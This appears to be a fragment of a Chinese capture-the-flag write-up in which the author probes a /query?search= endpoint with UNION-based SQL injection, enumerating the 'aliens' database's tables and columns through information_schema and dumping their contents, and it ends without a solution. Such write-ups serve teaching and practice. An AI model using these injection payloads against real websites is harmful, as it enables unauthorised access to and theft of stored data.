union联合查询:/query?search=amazonis_planitia union select 111,222 回显点如图所示:
查库:/query?search=amazonis_planitia union select version(),database()
查表:/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'
查utopia_basin表的字段:/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='utopia_basin'
好像还是没有发现什么可疑的内容…,再查查字段内容看看:/query?search=amazonis_planitia union select group_concat(name),group_concat(description) from aliens.utopia_basin
nmd…到这就迷了…然后接着去查了还有没有其他库:/query?search=amazonis_planitia union select 1,group_concat(database()) from information_schema.schemata 然后就把我看懵了…3个一样的数据库?
查查数据库个数:/query?search=amazonis_planitia union select database(),count(database())